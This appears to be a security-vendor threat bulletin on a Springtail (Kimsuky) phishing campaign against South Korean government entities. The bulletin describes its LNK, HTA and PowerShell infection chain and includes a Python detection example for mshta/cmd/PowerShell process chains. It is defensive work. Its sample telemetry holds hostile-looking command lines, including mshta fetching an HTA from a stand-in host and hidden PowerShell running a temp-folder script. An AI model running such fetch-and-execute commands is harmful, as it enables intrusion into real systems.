Springtail APT group targets South Korean government entities
April 07, 2025
The Springtail (aka Kimsuky) APT group recently engaged in campaigns targeting South Korean government entities. The campaigns leveraged government-themed messaging (one tax-related, another concerning a policy on sex offenders) to distribute malicious LNK files as malspam attachments.
The LNK files are responsible for downloading a malicious HTA, which is executed to continue the attack. Further components downloaded include a ZIP archive containing more malicious content in the form of encoded files along with VBS and PowerShell scripts. The end goals of the attack include data theft/exfiltration and keylogging, among others.
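The chain above (LNK, then an HTA run by mshta, then cmd/PowerShell stages) leaves a recognisable parent/child process trail, which is what the mshta/cmd/PowerShell adaptive detections named in this bulletin key on. The following is an added illustration, not Symantec code and not tied to any specific sample: it walks a handful of constructed process-creation events and flags the mshta-to-cmd, mshta-to-powershell and powershell-to-mshta parent/child pairs, plus mshta being handed a remote URL. The event format, the pids and the URL are all constructed for the example; the remote-URL check is an assumed heuristic, not something the bulletin states.

```python
"""Flag mshta/cmd/powershell process chains in constructed process-creation events.

Added example for illustration only; not Symantec's detection logic.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event: pid, parent pid, image name, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Parent -> child image pairs matching the chains the bulletin's adaptive
# detections are named after (Mshta-Cmd, Mshta-Ps, Ps-Mshta).
SUSPECT_CHAINS: Dict[Tuple[str, str], str] = {
    ("mshta.exe", "cmd.exe"): "mshta spawned cmd",
    ("mshta.exe", "powershell.exe"): "mshta spawned powershell",
    ("powershell.exe", "mshta.exe"): "powershell spawned mshta",
}

# Assumed heuristic: mshta pulling its HTA from a URL rather than a local file.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample telemetry (not from any real incident). Event 200 is mshta
# launched from explorer with a remote URL; 300 is cmd spawned by that mshta;
# 500 is a benign local HTA; 600 is an ordinary interactive PowerShell.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe", "mshta.exe http://example.invalid/update.hta"),
    ProcEvent(300, 200, "cmd.exe", 'cmd.exe /c powershell -w hidden -f "%TEMP%\\stage.ps1"'),
    ProcEvent(400, 300, "powershell.exe", 'powershell -w hidden -f "%TEMP%\\stage.ps1"'),
    ProcEvent(500, 100, "mshta.exe", 'mshta.exe "C:\\Program Files\\Vendor\\help.hta"'),
    ProcEvent(600, 100, "powershell.exe", "powershell.exe"),
]


def find_suspicious(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for every event that matches a suspect chain or heuristic.

    Parent lookup is by ppid within the same event batch; a child whose parent
    is not in the batch is still checked against the remote-URL heuristic.
    """
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        child = e.image.lower()
        parent = by_pid.get(e.ppid)
        if parent is not None:
            label = SUSPECT_CHAINS.get((parent.image.lower(), child))
            if label:
                findings.append((e.pid, label))
        if child == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            findings.append((e.pid, "mshta executing content from a remote URL"))
    return findings


if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

Running it against the constructed batch reports pid 200 (mshta with a remote URL) and pid 300 (cmd spawned by mshta); the local HTA and the stand-alone PowerShell session are left alone. In a real deployment the same pairing logic would be fed from EDR or Sysmon process-creation telemetry rather than a hard-coded list.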
Symantec protects you from this threat, identified by the following:
Adaptive-based
ACM.Mshta-Cmd!g1
ACM.Mshta-Ps!g1
ACM.Mshta-RgPst!g1
ACM.Ps-Mshta!g1
ACM.Ps-RgPst!g1
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing …